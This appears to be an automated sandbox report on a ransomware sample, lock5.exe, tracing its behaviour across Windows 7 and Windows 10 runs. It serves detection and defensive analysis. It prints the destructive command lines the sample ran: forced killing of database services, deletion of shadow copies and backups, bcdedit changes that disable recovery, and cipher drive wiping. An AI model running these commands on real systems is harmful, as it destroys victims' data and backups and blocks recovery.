Malware Analysis Report

2024-12-07 09:58

Sample ID 241114-grlg7synck
Target lock5.exe
SHA256 10916ae59a8f99306f1af033bb5e97df353e36be9eeaf41264a9146e56f9197e
Tags
defense_evasion discovery evasion execution impact persistence ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

10916ae59a8f99306f1af033bb5e97df353e36be9eeaf41264a9146e56f9197e

Threat Level: Known bad

The file lock5.exe was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery evasion execution impact persistence ransomware

Suspicious use of NtCreateUserProcessOtherParentProcess

Deletes shadow copies

Renames multiple (192) files with added filename extension

Modifies boot configuration data using bcdedit

Renames multiple (170) files with added filename extension

Deletes system backups

Adds Run key to start application

Enumerates connected drives

Drops file in Windows directory

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Unsigned PE

Uses Volume Shadow Copy service COM API

Suspicious use of AdjustPrivilegeToken

Interacts with shadow copies

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

Suspicious use of WriteProcessMemory

Runs net.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-14 06:02

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-14 06:02

Reported

2024-11-14 06:04

Platform

win7-20241023-en

Max time kernel

149s

Max time network

122s

Command Line

C:\Windows\Explorer.EXE

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2244 created 1200 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\Explorer.EXE

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (192) files with added filename extension

ransomware

Deletes system backups

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\lock5.exe\"" C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\cipher.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\cipher.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl C:\Windows\system32\wbadmin.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2244 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 3024 wrote to memory of 3008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2244 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2980 wrote to memory of 2848 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2848 wrote to memory of 1576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2244 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 2744 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2744 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2244 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2404 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2472 wrote to memory of 2164 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2244 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 572 wrote to memory of 1364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 1364 wrote to memory of 644 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2244 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 568 wrote to memory of 836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2244 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\lock5.exe

"C:\Users\Admin\AppData\Local\Temp\lock5.exe"

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im sqlbrowser.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im sql writer.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im sqlserv.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im msmdsrv.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im MsDtsSrvr.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im sqlceip.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im fdlauncher.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im Ssms.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE

C:\Windows\system32\taskkill.exe

taskkill -f -im SQLAGENT.EXE

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im fdhost.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im ReportingServicesService.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im msftesql.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im pg_ctl.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe

C:\Windows\system32\taskkill.exe

taskkill -f -impostgres.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100

C:\Windows\system32\net.exe

net stop MSSQLServerADHelper100

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop MSSQLServerADHelper100

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS

C:\Windows\system32\net.exe

net stop MSSQL$ISARS

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop MSSQL$ISARS

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW

C:\Windows\system32\net.exe

net stop MSSQL$MSFW

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop MSSQL$MSFW

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS

C:\Windows\system32\net.exe

net stop SQLAgent$ISARS

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SQLAgent$ISARS

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW

C:\Windows\system32\net.exe

net stop SQLAgent$MSFW

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SQLAgent$MSFW

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser

C:\Windows\system32\net.exe

net stop SQLBrowser

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SQLBrowser

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS

C:\Windows\system32\net.exe

net stop REportServer$ISARS

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop REportServer$ISARS

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop SQLWriter

C:\Windows\system32\net.exe

net stop SQLWriter

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SQLWriter

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest

C:\Users\Admin\AppData\Local\Temp\lock5.exe

\\?\C:\Users\Admin\AppData\Local\Temp\lock5.exe -network

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\wbadmin.exe

wbadmin delete backup -keepVersion:0 -quiet

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\System32\Wbem\WMIC.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\system32\wbadmin.exe

wbadmin DELETE SYSTEMSTABACKUP -deleteOldest

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoverynabled No

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c pause

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\cipher.exe

cipher /w:\\?\C:

C:\Windows\system32\cipher.exe

cipher /w:\\?\F:

C:\Windows\system32\cipher.exe

cipher /w:\\?\A:

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-14 06:02

Reported

2024-11-14 06:04

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

139s

Command Line

C:\Windows\Explorer.EXE

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2796 created 3424 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\Explorer.EXE

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (170) files with added filename extension

ransomware

Deletes system backups

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\lock5.exe\"" C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\lock5.exe\"" C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\A: C:\Windows\SYSTEM32\cipher.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\F: C:\Windows\SYSTEM32\cipher.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl C:\Windows\system32\wbadmin.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
